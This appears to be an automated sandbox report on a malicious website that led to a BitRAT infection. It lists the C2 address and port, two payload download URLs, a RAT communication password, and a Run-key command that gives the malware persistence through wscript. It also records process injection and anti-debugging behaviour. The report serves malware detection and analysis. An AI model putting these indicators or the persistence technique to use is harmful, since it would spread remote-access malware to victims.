Analysis
-
max time kernel
148s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
23-04-2024 15:27
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://ommcreation.in
Resource
win10v2004-20240412-en
General
-
Target
https://ommcreation.in
Malware Config
Extracted
http://77.221.151.31/a/z.png
Extracted
http://77.221.151.31/a/s.png
Extracted
bitrat
1.38
77.221.151.31:4444
-
communication_password
7b13ff385b95cf25d53088d6b7c5d890
-
tor_process
tor
Signatures
-
Blocklisted process makes network request 6 IoCs
flow pid Process 111 3000 powershell.exe 112 5608 powershell.exe 117 5288 powershell.exe 118 5964 powershell.exe 119 5728 powershell.exe 120 5504 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation WScript.exe -
resource yara_rule behavioral1/memory/3872-419-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-422-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-425-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-426-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-428-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/6036-437-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-446-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-448-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-450-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-449-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-451-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-452-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-453-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-454-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-455-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/6036-456-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/6036-462-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-461-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-463-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-487-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-507-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-508-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-509-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-510-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-511-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-513-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-514-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-515-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-516-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-518-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-517-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-519-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-520-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-521-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-534-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-535-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-618-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-619-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-620-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-639-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-640-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-641-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-642-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-643-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-654-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-665-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-666-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-667-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-689-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-690-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-691-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-692-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-693-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-695-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-708-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral1/memory/3872-709-0x0000000000400000-0x00000000007D3000-memory.dmp upx -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "wscript //E:VBScript C:\\Users\\Public\\0x.log //Nologo" powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
pid Process 3872 RegSvcs.exe 3872 RegSvcs.exe 3872 RegSvcs.exe 3872 RegSvcs.exe 3872 RegSvcs.exe 6036 RegSvcs.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 5728 set thread context of 3872 5728 powershell.exe 160 PID 5964 set thread context of 6036 5964 powershell.exe 161 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000_Classes\Local Settings msedge.exe -
Suspicious behavior: EnumeratesProcesses 60 IoCs
pid Process 1532 msedge.exe 1532 msedge.exe 884 msedge.exe 884 msedge.exe 3996 identity_helper.exe 3996 identity_helper.exe 5512 msedge.exe 5512 msedge.exe 5872 msedge.exe 5872 msedge.exe 5928 msedge.exe 5928 msedge.exe 3000 powershell.exe 3000 powershell.exe 5608 powershell.exe 5608 powershell.exe 5608 powershell.exe 3000 powershell.exe 5964 powershell.exe 5964 powershell.exe 5288 powershell.exe 5288 powershell.exe 5964 powershell.exe 5288 powershell.exe 5728 powershell.exe 5728 powershell.exe 5504 powershell.exe 5504 powershell.exe 5728 powershell.exe 5504 powershell.exe 6076 msedge.exe 6076 msedge.exe 5936 msedge.exe 5936 msedge.exe 5284 msedge.exe 5284 msedge.exe 5336 msedge.exe 5336 msedge.exe 3032 msedge.exe 3032 msedge.exe 1388 msedge.exe 1388 msedge.exe 5656 msedge.exe 5656 msedge.exe 5892 msedge.exe 5892 msedge.exe 5860 msedge.exe 5860 msedge.exe 6080 msedge.exe 6080 msedge.exe 2972 msedge.exe 2972 msedge.exe 6044 msedge.exe 6044 msedge.exe 1428 msedge.exe 1428 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 29 IoCs
pid Process 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 3000 powershell.exe Token: SeDebugPrivilege 5608 powershell.exe Token: SeDebugPrivilege 5964 powershell.exe Token: SeDebugPrivilege 5288 powershell.exe Token: SeDebugPrivilege 5728 powershell.exe Token: SeDebugPrivilege 5504 powershell.exe Token: SeShutdownPrivilege 3872 RegSvcs.exe Token: SeShutdownPrivilege 6036 RegSvcs.exe Token: SeBackupPrivilege 3024 svchost.exe Token: SeRestorePrivilege 3024 svchost.exe Token: SeSecurityPrivilege 3024 svchost.exe Token: SeTakeOwnershipPrivilege 3024 svchost.exe Token: 35 3024 svchost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe 884 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3872 RegSvcs.exe 3872 RegSvcs.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 884 wrote to memory of 3524 884 msedge.exe 86 PID 884 wrote to memory of 3524 884 msedge.exe 86 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 4216 884 msedge.exe 87 PID 884 wrote to memory of 1532 884 msedge.exe 88 PID 884 wrote to memory of 1532 884 msedge.exe 88 PID 884 wrote to memory of 3220 884 msedge.exe 89 PID 884 wrote to memory of 3220 884 msedge.exe 89 PID 884 wrote to memory of 3220 884 msedge.exe 89 PID 884 wrote to memory of 3220 884 msedge.exe 89 PID 884 wrote to memory of 3220 884 msedge.exe 89 PID 884 wrote to memory of 3220 884 msedge.exe 89 PID 884 wrote to memory of 3220 884 msedge.exe 89 PID 884 wrote to memory of 3220 884 msedge.exe 89 PID 884 wrote to memory of 3220 884 msedge.exe 89 PID 884 wrote to memory of 3220 884 msedge.exe 89 PID 884 wrote to memory of 3220 884 msedge.exe 89 PID 884 wrote to memory of 3220 884 msedge.exe 89 PID 884 wrote to memory of 3220 884 msedge.exe 89 PID 884 wrote to memory of 3220 884 msedge.exe 89 PID 884 wrote to memory of 3220 884 msedge.exe 89 PID 884 wrote to memory of 3220 884 msedge.exe 89 PID 884 wrote to memory of 3220 884 msedge.exe 89 PID 884 wrote to memory of 3220 884 msedge.exe 89 PID 884 wrote to memory of 3220 884 msedge.exe 89 PID 884 wrote to memory of 3220 884 msedge.exe 89 -
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 5716 attrib.exe 5940 attrib.exe 5044 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ommcreation.in1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:884 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffde1ca46f8,0x7ffde1ca4708,0x7ffde1ca47182⤵PID:3524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:22⤵PID:4216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:82⤵PID:3220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:12⤵PID:3528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:12⤵PID:2612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5472 /prefetch:82⤵PID:2568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5472 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:12⤵PID:5136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:12⤵PID:5244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:12⤵PID:5264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:12⤵PID:5320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:12⤵PID:5396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6272 /prefetch:82⤵PID:5492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6292 /prefetch:12⤵PID:5500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6528 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6576 /prefetch:12⤵PID:5520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6760 /prefetch:12⤵PID:5612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2828 /prefetch:12⤵PID:5860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5056 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5632 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1992 /prefetch:12⤵PID:5336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:12⤵PID:5344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4644 /prefetch:12⤵PID:5932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:12⤵PID:6016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6780 /prefetch:12⤵PID:6088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6812 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:6076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6344 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3664 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6276 /prefetch:12⤵PID:5536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:12⤵PID:2176
-
-
